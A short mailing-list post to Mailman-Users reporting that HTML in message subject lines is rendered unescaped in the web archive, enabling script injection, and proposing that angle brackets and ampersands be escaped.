[Mailman-Users] Web-based list archive problem

[Eric A. Meyer]

Hi,

    A quick question that may be answered elsewhere, and if so I 
apologize. In the Web-based list archive, any HTML tags that are 
included in the "subject" line of a message get sent to the browser 
as HTML, and so start opening elements like <input>, <pre>, or 
inserting <hr>s.  It would be a very good idea to translate the HTML 
angle-bracket characters to &lt; &gt; (or the numeric equivalents) at 
a minimum-- ampersands should probably get the same treatment.  As 
things are now, someone could post a message with a subject line 
containing a 'script' element that points to a security-exploiting 
piece of JS somewhere, thus making that month's archive into a trojan 
horse.

--
Eric A. Meyer (eric at meyerweb.com) http://www.meyerweb.com/eric/
Author, "Cascading Style Sheets: The Definitive Guide" and
"CSS 2.0 Programmer's Reference"  http://www.meyerweb.com/eric/books/